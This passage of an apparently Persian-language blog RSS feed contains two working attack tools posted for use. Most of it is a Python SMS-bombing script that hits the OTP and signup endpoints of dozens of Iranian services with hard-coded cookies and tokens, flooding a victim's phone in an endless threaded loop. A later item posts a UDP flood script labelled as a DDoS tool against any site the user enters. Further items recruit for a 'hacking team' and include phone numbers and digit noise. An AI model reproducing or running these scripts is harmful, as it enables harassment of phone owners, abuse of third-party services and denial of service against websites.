&#x27;en-US,en;q=0.9&#x27;,&#x27;content-type&#x27;: &#x27;application/json&#x27;,&#x27;origin&#x27;: &#x27;https://ghabzino.com&#x27;,&#x27;referer&#x27;: &#x27;https://ghabzino.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 OPR/82.0.4227.23&#x27;}    try:        ok = get(timeout=5, url=ghU, headers=ghH, json=ghJ).json()        if ok[&quot;Parameters&quot;] != None:            print(f&#x27;{g}(Ghabzino) {w}Code Was Sent&#x27;)            return True    except:        passdef simkhanF(phone):    ghJ = {    &quot;mobileNumber&quot;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1],    &quot;ReSendSMS&quot;: False}    ghU = &#x27;https://www.simkhanapi.ir/api/users/registerV2&#x27;    ghH = {&#x27;Accept&#x27;: &#x27;application/json&#x27;,&#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;Accept-Language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;Authorization&#x27;: &#x27;Bearer undefined&#x27;,&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,&#x27;Content-Type&#x27;: &#x27;application/json&#x27;,&#x27;Host&#x27;: &#x27;www.simkhanapi.ir&#x27;,&#x27;Origin&#x27;: &#x27;https://simkhan.ir&#x27;,&#x27;Referer&#x27;: &#x27;https://simkhan.ir/&#x27;,&#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 OPR/82.0.4227.23&#x27;}    try:        ok = post(timeout=5, url=ghU, headers=ghH, json=ghJ).json()        if ok[&#x27;Message&#x27;] == &quot;ثبت نام شما با موفقیت انجام شد&quot;:            print(f&#x27;{g}(SimKhan) {w}Code Was Sent&#x27;)            return True    except:        passdef simkhanT(phone):    ghJ = {    &quot;mobileNumber&quot;: &#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1],    &quot;ReSendSMS&quot;: True}    ghU = &#x27;https://www.simkhanapi.ir/api/users/registerV2&#x27;    ghH = {&#x27;Accept&#x27;: &#x27;application/json&#x27;,&#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;Accept-Language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;Authorization&#x27;: &#x27;Bearer undefined&#x27;,&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,&#x27;Content-Type&#x27;: &#x27;application/json&#x27;,&#x27;Host&#x27;: &#x27;www.simkhanapi.ir&#x27;,&#x27;Origin&#x27;: &#x27;https://simkhan.ir&#x27;,&#x27;Referer&#x27;: &#x27;https://simkhan.ir/&#x27;,&#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 OPR/82.0.4227.23&#x27;}    try:        ok = post(timeout=5, url=ghU, headers=ghH, json=ghJ).json()        if ok[&#x27;Message&#x27;] == &quot;ثبت نام شما با موفقیت انجام شد&quot;:            print(f&#x27;{g}(SimKhan) {w}Code Was Sent&#x27;)            return True    except:        passdef drsaina(phone):    ghD = f&quot;__RequestVerificationToken=CfDJ8NPBKm5eTodHlBQhmwjQAVUgCtuEzkxhMWwcm9NyjTpueNnMgHEElSj7_JXmfrsstx9eCNrsZ5wiuLox0OSfoEvDvJtGb7NC5z6Hz7vMEL4sBlF37_OryYWJ0CCm4gpjmJN4BxSjZ24pukCJF2AQiWg&amp;noLayout=False&amp;action=checkIfUserExistOrNot&amp;lId=&amp;codeGuid=00000000-0000-0000-0000-000000000000&amp;PhoneNumber={&#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1]}&amp;confirmCode=&amp;fullName=&amp;Password=&amp;Password2=&quot;    ghU = &#x27;https://www.drsaina.com/RegisterLogin?ReturnUrl=%2Fconsultation&#x27;    ghH = {&#x27;accept&#x27;: &#x27;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;cache-control&#x27;: &#x27;max-age=0&#x27;,&#x27;content-type&#x27;: &#x27;application/x-www-form-urlencoded&#x27;,&#x27;cookie&#x27;: &#x27;.AspNetCore.Antiforgery.ej9TcqgZHeY=CfDJ8NPBKm5eTodHlBQhmwjQAVWqg8-UO73YXzMYVhYk28IlZQexrnyEhYldxs2Ylnp3EZE2o3tccNQ0E7vRSUGVMNDfmcFOKPcUCG7sysT7unE5wui_vwzMvyCNDqIRZ1Wxd2AKD3s3lu-2BvFOXc_j7ts; anonymousId=-fmvaw07O1miRXbHtKTVT; segmentino-user={&quot;id&quot;:&quot;-fmvaw07O1miRXbHtKTVT&quot;,&quot;userType&quot;:&quot;anonymous&quot;}; _613757e830b8233caf20b7d3=true; _ga=GA1.2.1051525883.1639482327; _gid=GA1.2.2109855712.1639482327; __asc=bf42042917db8c3006a2b4dcf49; __auc=bf42042917db8c3006a2b4dcf49; analytics_token=a93f2bb1-30d0-4e99-18cc-b84fcda27ae9; yektanet_session_last_activity=12/14/2021; _yngt_iframe=1; _gat_UA-126198313-1=1; analytics_campaign={%22source%22:%22google%22%2C%22medium%22:%22cpc%22%2C%22campaign%22:%22adwords%22%2C%22content%22:%22adwords%22}; analytics_session_token=efcee442-344d-1374-71b8-60ca960029c9; _yngt=d628b56e-eef52-280a4-4afe0-012e33e23ce9b; _gac_UA-126198313-1=1.1639482345.EAIaIQobChMImrmRrJvj9AIV2ZTVCh07_gUpEAAYASAAEgILoPD_BwE; cache_events=true&#x27;,&#x27;origin&#x27;: &#x27;https://www.drsaina.com&#x27;,&#x27;referer&#x27;: &#x27;https://www.drsaina.com/RegisterLogin?ReturnUrl=%2Fconsultation&#x27;,&#x27;upgrade-insecure-requests&#x27;: &#x27;1&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 OPR/82.0.4227.23&#x27;}    try:        ok = post(timeout=5, url=ghU, headers=ghH, data=ghD).text        if &#x27;کد تایید 6 رقمی پیامک شده به شماره&#x27; in ok:            print(f&#x27;{g}(DrSaina) {w}Code Was Sent&#x27;)            return True    except:        passdef binjo(phone):    ghU = f&quot;https://api.binjo.ir/api/panel/get_code/{&#x27;0&#x27;+phone.split(&#x27;+98&#x27;)[1]}&quot;    ghH = {&#x27;Accept&#x27;: &#x27;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&#x27;,&#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;Accept-Language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;Cache-Control&#x27;: &#x27;max-age=0&#x27;,&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,&#x27;Cache-Control&#x27;: &#x27;no-cache, private&#x27;,&#x27;Content-Encoding&#x27;: &#x27;gzip&#x27;,&#x27;Content-Type&#x27;: &#x27;application/json&#x27;,&#x27;Cookie&#x27;: &#x27;laravel_session=eyJpdiI6InY0T2JYTndZb0xacURzcXFtWWxORHc9PSIsInZhbHVlIjoiUmo1bVd0UklmdjJyc1wvZGNHVDRuRU96RVZVZFhpb1N4ZmJ3NkduUGJYMGhyRG42QVNwVUNHVlZZRUNqV0hjUysiLCJtYWMiOiIzNTBlOWIzOTkxMDYyM2EzNzViYWFhYjdkM2FlNjQ1YmZjOTU3NzNiMjRlYjNlMmZiZmQzOGRkZTI0Yzc0NTU1In0%3D&#x27;,&#x27;Host&#x27;: &#x27;api.binjo.ir&#x27;,&#x27;Upgrade-Insecure-Requests&#x27;: &#x27;1&#x27;,&#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 OPR/82.0.4227.23&#x27;}    try:        ok = get(timeout=5, url=ghU, headers=ghH, verify=False).json()        if ok[&#x27;status&#x27;] == &#x27;ok&#x27;:            print(f&#x27;{g}(BinJo) {w}Code Was Sent&#x27;)            return True    except:        passdef limome(phone):    liD = {&#x27;mobileNumber&#x27;: phone.split(&#x27;+98&#x27;)[1],&#x27;country&#x27;: &#x27;1&#x27;}    liU = &#x27;https://my.limoome.com/api/auth/login/otp&#x27;    liH = {&#x27;Accept&#x27;: &#x27;application/json, text/javascript, */*; q=0.01&#x27;,&#x27;Accept-Encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;Accept-Language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;Connection&#x27;: &#x27;keep-alive&#x27;,&#x27;Content-Type&#x27;: &#x27;application/x-www-form-urlencoded; charset=UTF-8&#x27;,&#x27;Cookie&#x27;: &#x27;sess=00da3860-929a-4429-aef9-82bb64f9a439; basalam-modal=1&#x27;,&#x27;Host&#x27;: &#x27;my.limoome.com&#x27;,&#x27;Origin&#x27;: &#x27;https://my.limoome.com&#x27;,&#x27;Referer&#x27;: &#x27;https://my.limoome.com/login?redirectlogin=%252Fdiet%252Fpayment&#x27;,&#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 OPR/82.0.4227.33&#x27;,&#x27;X-Requested-With&#x27;: &#x27;XMLHttpRequest&#x27;}    try:        liR = post(timeout=5, url=liU, headers=liH, data=liD).json()        if liR[&#x27;status&#x27;] == &#x27;success&#x27;:            print(f&#x27;{g}(Limome) {w}Code Was Sent&#x27;)            return True    except:        passdef bimito(phone):    liU = f&quot;https://bimito.com/api/core/app/user/checkLoginAvailability/%7B%22phoneNumber%22%3A%220{phone.split(&#x27;+98&#x27;)[1]}%22%7D&quot;    liH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;cookie&#x27;: &#x27;_gcl_aw=GCL.1639580987.EAIaIQobChMI1t3Y-Irm9AIVk4xoCR0UowKLEAAYASAAEgLCS_D_BwE; _gcl_au=1.1.1134321035.1639580987; _ga=GA1.2.74824389.1639580987; _gid=GA1.2.40868592.1639580992; analytics_campaign={%22source%22:%22google%22%2C%22medium%22:%22cpc%22%2C%22campaign%22:%22adwords%22%2C%22content%22:%22adwords%22}; analytics_token=9fbae680-00a7-8cbf-6be6-90980eae790f; yektanet_session_last_activity=12/15/2021; _yngt_iframe=1; _gac_UA-89339097-1=1.1639580999.EAIaIQobChMI1t3Y-Irm9AIVk4xoCR0UowKLEAAYASAAEgLCS_D_BwE; _yngt=d628b56e-eef52-280a4-4afe0-012e33e23ce9b; _clck=dlyt9o|1|exa|0; crisp-client%2Fsession%2Fbde9082c-438a-4943-b9b5-362fed0a182a=session_2fdd45a5-8c9d-4638-b21a-40a2ebd422db; _clsk=ktdj0|1639581807259|2|1|d.clarity.ms/collect; _ga_5LWTRKET98=GS1.1.1639580986.1.1.1639581904.60&#x27;,&#x27;device&#x27;: &#x27;web&#x27;,&#x27;deviceid&#x27;: &#x27;3&#x27;,&#x27;origin&#x27;: &#x27;https://bimito.com&#x27;,&#x27;referer&#x27;: &#x27;https://bimito.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 OPR/82.0.4227.33&#x27;,&#x27;user-token&#x27;: &#x27;swS1oSzN22kTVTI8DqtRhUrgUfsKBiRdBeosjlczNV07XSbeVHB7R622Mw9O7uzp&#x27;}    try:        liR = post(timeout=5, url=liU, headers=liH).json()        if liR[&#x27;message&#x27;] == &#x27;کاربر قبلا ثبت نام نکرده است&#x27;:            print(f&#x27;{g}(BimitoVip) {w}Code Was Sent&#x27;)            return True    except:        passdef bimitoVip(phone):    liU = f&quot;https://bimito.com/api/core/app/user/loginWithVerifyCode/%7B%22phoneNumber%22:%220{phone.split(&#x27;+98&#x27;)[1]}%22%7D&quot;    liH = {&#x27;accept&#x27;: &#x27;application/json, text/plain, */*&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;cookie&#x27;: &#x27;_gcl_aw=GCL.1639580987.EAIaIQobChMI1t3Y-Irm9AIVk4xoCR0UowKLEAAYASAAEgLCS_D_BwE; _gcl_au=1.1.1134321035.1639580987; _ga=GA1.2.74824389.1639580987; _gid=GA1.2.40868592.1639580992; analytics_campaign={%22source%22:%22google%22%2C%22medium%22:%22cpc%22%2C%22campaign%22:%22adwords%22%2C%22content%22:%22adwords%22}; analytics_token=9fbae680-00a7-8cbf-6be6-90980eae790f; yektanet_session_last_activity=12/15/2021; _yngt_iframe=1; _gac_UA-89339097-1=1.1639580999.EAIaIQobChMI1t3Y-Irm9AIVk4xoCR0UowKLEAAYASAAEgLCS_D_BwE; _yngt=d628b56e-eef52-280a4-4afe0-012e33e23ce9b; _clck=dlyt9o|1|exa|0; crisp-client%2Fsession%2Fbde9082c-438a-4943-b9b5-362fed0a182a=session_2fdd45a5-8c9d-4638-b21a-40a2ebd422db; _clsk=ktdj0|1639581807259|2|1|d.clarity.ms/collect; _ga_5LWTRKET98=GS1.1.1639580986.1.1.1639581904.60&#x27;,&#x27;device&#x27;: &#x27;web&#x27;,&#x27;deviceid&#x27;: &#x27;3&#x27;,&#x27;origin&#x27;: &#x27;https://bimito.com&#x27;,&#x27;referer&#x27;: &#x27;https://bimito.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 OPR/82.0.4227.33&#x27;,&#x27;user-token&#x27;: &#x27;swS1oSzN22kTVTI8DqtRhUrgUfsKBiRdBeosjlczNV07XSbeVHB7R622Mw9O7uzp&#x27;}    try:        liR = post(timeout=5, url=liU, headers=liH).json()        if liR[&#x27;message&#x27;] == &#x27;کاربر قبلا ثبت نام نشده است&#x27;:            print(f&#x27;{g}(BimitoVip) {w}Code Was Sent&#x27;)            return True    except:        passdef seebirani(phone):    liJ = {    &quot;username&quot;: &quot;0&quot;+phone.split(&#x27;+98&#x27;)[1]}    liU = &quot;https://sandbox.sibirani.ir/api/v1/user/invite&quot;    liH = {&#x27;accept&#x27;: &#x27;application/json&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;content-type&#x27;: &#x27;application/json&#x27;,&#x27;origin&#x27;: &#x27;https://developer.sibirani.com&#x27;,&#x27;referer&#x27;: &#x27;https://developer.sibirani.com/&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 OPR/82.0.4227.33&#x27;}    try:        post(timeout=5, url=liU, headers=liH, json=liJ)        print(f&#x27;{g}(SeebIrani) {w}Code Was Sent&#x27;)        return True    except:        passdef mihanpezeshk(phone):    gaD = f&#x27;_token=bBSxMx7ifcypKJuE8qQEhahIKpcVApWdfZXFkL8R&amp;mobile={&quot;0&quot;+phone.split(&quot;+98&quot;)[1]}&amp;recaptcha=&#x27;    gaU = &#x27;https://www.mihanpezeshk.com/ConfirmCodeSbm_Patient&#x27;    gaH = {&#x27;accept&#x27;: &#x27;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&#x27;,&#x27;accept-encoding&#x27;: &#x27;gzip, deflate, br&#x27;,&#x27;accept-language&#x27;: &#x27;en-US,en;q=0.9&#x27;,&#x27;cache-control&#x27;: &#x27;max-age=0&#x27;,&#x27;content-type&#x27;: &#x27;application/x-www-form-urlencoded&#x27;,&#x27;cookie&#x27;: &#x27;XSRF-TOKEN=eyJpdiI6IitzYVZRQzFLdGlKNHRHRjIxb3R4VWc9PSIsInZhbHVlIjoianR6SXBJXC9rUStMRCs0ajUzalNjM1pMN053bUNtSlJ5dzYrVzFxV1dtXC9SREp4OTJ0Wm1RWW9yRVwvM29Cc3l4SCIsIm1hYyI6IjdjODczZWI4Y2Q2N2NhODVkNjE5YTRkOWVhNjRhNDRlNmViZjhlNDVkNDYwODFkNzViOTU2ZTdjYTUwZjhjMWUifQ%3D%3D; laravel_session=eyJpdiI6ImU3dlpRdXV1XC9TMmJEWk1LMkFTZGJRPT0iLCJ2YWx1ZSI6IktHTWF0bFlJU0VqVCthamp5aW1GRHdBM1lNcjNMcVFxMWM5Ynd3clZLQzdva2ZJWXRiRU4xaUhyMnVHMG90RkUiLCJtYWMiOiJkZWRmMGM5YzFiNDNiOTJjYWFiZDc0MjYxMDUyMzBmYTMzMmI5ZTBkODA1YTMxODQyYzM2NjVjZWExZmYwMzdhIn0%3D&#x27;,&#x27;origin&#x27;: &#x27;https://www.mihanpezeshk.com&#x27;,&#x27;referer&#x27;: &#x27;https://www.mihanpezeshk.com/confirmcodePatient&#x27;,&#x27;upgrade-insecure-requests&#x27;: &#x27;1&#x27;,&#x27;user-agent&#x27;: &#x27;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36&#x27;}    try:        gaR = post(url=gaU, headers=gaH, data=gaD)        print(f&#x27;{g}(MihanPezeshk) {w}Code Was Sent&#x27;)        return True    except:        passdef mek(phone):    meU = &#x27;https://www.hamrah-mechanic.com/api/v1/auth/login&#x27;    meH = {&quot;Accept&quot;: &quot;application/json&quot;,&quot;Accept-Encoding&quot;: &quot;gzip, deflate, br&quot;,&quot;Accept-Language&quot;: &quot;en-US,en;q=0.5&quot;,&quot;Connection&quot;: &quot;keep-alive&quot;,&quot;Content-Type&quot;: &quot;application/json&quot;,&quot;Cookie&quot;: &quot;_ga=GA1.2.1307952465.1641249170; analytics_campaign={%22source%22:%22google%22%2C%22medium%22:%22organic%22}; analytics_token=2527d893-9de1-8fee-9f73-d666992dd3d5; _yngt=9d6ba2d2-fd1c-4dcc-9f77-e1e364af4434; _hjSessionUser_619539=eyJpZCI6IjcyOTJiODRhLTA2NGUtNTA0Zi04Y2RjLTA2MWE3ZDgxZDgzOSIsImNyZWF0ZWQiOjE2NDEyNDkxNzEzMTUsImV4aXN0aW5nIjp0cnVlfQ==; _gid=GA1.2.284804399.1642278349; _gat_gtag_UA_106934660_1=1; _gat_UA-0000000-1=1; analytics_session_token=238e3f23-aff7-8e3a-f1d4-ef4f6c471e2b; yektanet_session_last_activity=1/15/2022; _yngt_iframe=1; _gat_UA-106934660-1=1; _hjIncludedInSessionSample=0; _hjSession_619539=eyJpZCI6IjRkY2U2ODUwLTQzZjktNGM0Zi1iMWUxLTllY2QzODA3ODhiZCIsImNyZWF0ZWQiOjE2NDIyNzgzNTYzNjgsImluU2FtcGxlIjpmYWxzZX0=; _hjIncludedInPageviewSample=1; _hjAbsoluteSessionInProgress=0&quot;,&quot;Host&quot;: &quot;www.hamrah-mechanic.com&quot;,&quot;Origin&quot;: &quot;https://www.hamrah-mechanic.com&quot;,&quot;Referer&quot;: &quot;https://www.hamrah-mechanic.com/membersignin/&quot;,&quot;Source&quot;: &quot;web&quot;,&quot;TE&quot;: &quot;trailers&quot;,&quot;User-Agent&quot;: &quot;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0&quot;}    meD = {	&quot;landingPageUrl&quot;: &quot;https://www.hamrah-mechanic.com/&quot;,	&quot;orderPageUrl&quot;: &quot;https://www.hamrah-mechanic.com/membersignin/&quot;,	&quot;phoneNumber&quot;: &quot;0&quot;+phone.split(&quot;+98&quot;)[1],	&quot;prevDomainUrl&quot;: None,	&quot;prevUrl&quot;: None,	&quot;referrer&quot;: &quot;https://www.google.com/&quot;}    try:        meR = post(url=meU, headers=meH, data=meD).json()        if meR[&#x27;isSuccess&#x27;]:            print(f&#x27;{g}(HamrahMechanic) {w}کد ارسال شد&#x27;)            return True    except: pass# ================================[SEND SMS FUNC]================================def is_phone(phone: str):    phone = sub(&quot;\s+&quot;, &quot;&quot; ,phone.strip())    if match(r&quot;^\+989[0-9]{9}$&quot;, phone):        return phone    elif match(r&quot;^989[0-9]{9}$&quot;, phone):        return f&quot;+{phone}&quot;    elif match(r&quot;^09[0-9]{9}$&quot;, phone):        return f&quot;+98{phone[1::]}&quot;    elif match(r&quot;^9[0-9]{9}$&quot;, phone):        return f&quot;+98{phone}&quot;    else:        return Falsedef printLow(Str):    for char in Str:        print(char, end=&#x27;&#x27;, flush=True)        sleep(.01)def start(x: int, S: str):    if active_count() &lt; x:        exec&#40;S&#41;r=&#x27;\033[1;31m&#x27;g=&#x27;\033[32;1m&#x27; y=&#x27;\033[1;33m&#x27;w=&#x27;\033[1;37m&#x27;printLow(&#x27;::::::88:::88::88::88::::::&#x60;        &amp;z \&#x27;::::::::88:::88::88::88::::::::&#x60;      (z \&#x27;::::::::::88:::88::88::88::::::::::&#x60;    *z::::::::::::88:::88::88::88::::::::::::   *z:::::::::::::88888888888888d:::::::::::::  +z::::::::::::::88888888888888::::::::::::::: ,z \&#x27;::::::::::::::b8888888888888:::::::::::::::\&#x27; /z::::::::::::::::888:::|:::888::::::::::::::::-z:::::::P88888888888Y::|::P88888888888Y::::::: .z                   ::::P8daaaaaaaaaa88Y:T:P88aaaaaaaaaab8Y:::::?z.::::88::::::::::::P88888Y::::::::::::88:::::-z::::b8:::::::::::P8888888Y:::::::::::8d:::: ,z::::bY:::::::::P888888888Y:::::::::Pd::::  +z::::bY::::::::88888888888::::::::Pd::::   *z.:::b8888888888aa8888888a8888888d:::.    )z.:::b888888a??88888888?:8888d:::.      \&#x27;z.::::b8::?88888888888?:d::::.        %z..:::aab8888888daa:::..           &quot;z..:::::::::.&#x27;)def Vip(phone, Time):    Thread(target=snap, args=[phone]).start(), sleep(Time)    Thread(target=gap, args=[phone]).start(), sleep(Time)    Thread(target=tap30, args=[phone]).start(), sleep(Time)    Thread(target=divar, args=[phone]).start(), sleep(Time)    Thread(target=torob, args=[phone]).start(), sleep(Time)    Thread(target=snapfood, args=[phone]).start(), sleep(Time)    Thread(target=sheypoor, args=[phone]).start(), sleep(Time)    Thread(target=alibaba, args=[phone]).start(), sleep(Time)    Thread(target=smarket, args=[phone]).start(), sleep(Time)    Thread(target=sTrip, args=[phone]).start(), sleep(Time)    Thread(target=drdr, args=[phone]).start(), sleep(Time)    Thread(target=filmnet, args=[phone]).start(), sleep(Time)    Thread(target=itool, args=[phone]).start(), sleep(Time)        Thread(target=anar, args=[phone]).start(), sleep(Time)    Thread(target=azki, args=[phone]).start(), sleep(Time)    Thread(target=nobat, args=[phone]).start(), sleep(Time)    Thread(target=bn, args=[phone]).start(), sleep(Time)    Thread(target=baskol, args=[phone]).start(), sleep(Time)    Thread(target=basalam, args=[phone]).start(), sleep(Time)    Thread(target=ghabzino, args=[phone]).start(), sleep(Time)    Thread(target=okorosh, args=[phone]).start(), sleep(Time)    Thread(target=bimito, args=[phone]).start(), sleep(Time)    Thread(target=gapfilm, args=[phone]).start(), sleep(Time)    Thread(target=bimitoVip, args=[phone]).start(), sleep(Time)        Thread(target=seebirani, args=[phone]).start(), sleep(Time)    Thread(target=limome, args=[phone]).start(), sleep(Time)    Thread(target=binjo, args=[phone]).start(), sleep(Time)    Thread(target=kilid, args=[phone]).start(), sleep(Time)    Thread(target=didnegar, args=[phone]).start(), sleep(Time)    Thread(target=olgoo, args=[phone]).start(), sleep(Time)    Thread(target=chmdon, args=[phone]).start(), sleep(Time)     Thread(target=drsaina, args=[phone]).start(), sleep(Time)    Thread(target=see5, args=[phone]).start(), sleep(Time)    Thread(target=simkhanT, args=[phone]).start(), sleep(Time)    Thread(target=simkhanF, args=[phone]).start(), sleep(Time)    Thread(target=lendo, args=[phone]).start(), sleep(Time)    Thread(target=pakhsh, args=[phone]).start(), sleep(Time)    Thread(target=mihanpezeshk, args=[phone]).start(), sleep(Time)    Thread(target=mek, args=[phone]).start(), sleep(Time)while True:    phone = is_phone(input(f&#x27;{g}[?] {y}شماری کسی که میخواهی ببمبر بزنی رو بزن  بدون(صفر) {g}(+98) {r}- {w}&#x27;))    if phone:        breaktry:    Time = float(input(f&#x27;{g}[?] {y}مدت اس امس بمبر   {g}[پیشفرض=0.1] {r}- {w}&#x27;))except ValueError:    Time = 0.1    print(f&quot;{g}[0.1] {w}Used&quot;)while True:    try: Vip(phone, Time)    except KeyboardInterrupt: exit(f&#x27;{r}[-] User Exited&#x27;)    except: print(f&#x27;{r}[-] Error TimeOut&#x27;)# Channel: reman_securit</description>
                <category>Hoten Musavi</category>
                <author>Hoten Musavi</author>
                <pubDate>Thu, 22 Dec 2022 16:48:06 +0330</pubDate>
            </item>
                    <item>
                <title>هک و امینت</title>
                <link>https://virgool.io/@mok47363/%D9%87%DA%A9-%D9%88-%D8%A7%D9%85%DB%8C%D9%86%D8%AA-rgpp2rtfdn8u</link>
                <description>Merhaba beyler nasılsınız? آقا امروز اومدم یه تیم بزنیم و سایبری و کلاه سفید بیاد بچه سال اینا نیاد برای ورود به تیم باید کامپیوتر یا لپ تاپ داشته باشین و هک امنیت بلد باشه وگرنه از تیم حذف میشه ببرای عضویت برای تیم .واتساپ یا تلگرام یا روبیکا شماره :09934100815برای تماس و روبیکا   نام تیم :mok</description>
                <category>Hoten Musavi</category>
                <author>Hoten Musavi</author>
                <pubDate>Wed, 21 Dec 2022 13:15:39 +0330</pubDate>
            </item>
                    <item>
                <title>زبان برنامه نویسی</title>
                <link>https://virgool.io/@mok47363/%D8%B2%D8%A8%D8%A7%D9%86-%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%D9%86%D9%88%DB%8C%D8%B3%DB%8C-yf4ribpch197</link>
                <description>Merhaba beyler nasılsınız? آقا اومدیم با یه کد پایتون برای اولین بار در ایران دیداس سایت کدشون پاین میزارم:print(&#x27;______-------#------__________--------_-_-_-_&#x27;)print(&#x27;20000 servers ready to attack ✓✓√&#x27;)import timeimport socketimport sysimport _threadimport requestsresponse =requests.get(&#x27;https://www.google.com&#x27;)print(response)site = input(&quot;Site address =&gt; &quot;)thread_count = input(&quot;port=&gt; &quot;)ip = socket.gethostbyname(site)UDP_PORT = 80MESSAGE = &#x27;Hoten Emperor&#x27;print(&quot;IP address:&quot;, ip)print(&quot;You got port 80&quot;, UDP_PORT)time.sleep(3)def ddos(i):    while 1:        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)        sock.sendto(bytes(MESSAGE,&quot;UTF-8&quot;), (ip, UDP_PORT))        print(&quot; Didas attack&quot;)for i in range(int(thread_count)):    try:        _thread.start_new_thread(ddos, (&quot;Thread-&quot; + str(i),))    except KeyboardInterrupt:        sys.exit(0)while 1:    passخب این توی پایتون اجرا کنین خدا نگهدارسازنده :هوتن موسوی </description>
                <category>Hoten Musavi</category>
                <author>Hoten Musavi</author>
                <pubDate>Wed, 21 Dec 2022 13:08:28 +0330</pubDate>
            </item>
                    <item>
                <title>زبان برنامه نویسی C#</title>
                <link>https://virgool.io/@mok47363/%D8%B2%D8%A8%D8%A7%D9%86-%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%D9%86%D9%88%DB%8C%D8%B3%DB%8C-c-gisbpuhq0grg</link>
                <description>سلام بچه ها هوتن موسوی هستم زبان برنامه نویسی یاد میدم در زمینه هک امنیت شمارم برای تماس برای پیام 0993410081509046517174برای هک نشدن سایت ویرگول456444867574555588545555979415548755494955555555578665112365855655555544485555557745855545555575855588888885555654855555555555https://Hhotn.com</description>
                <category>Hoten Musavi</category>
                <author>Hoten Musavi</author>
                <pubDate>Tue, 20 Dec 2022 15:55:55 +0330</pubDate>
            </item>
            </channel>
</rss>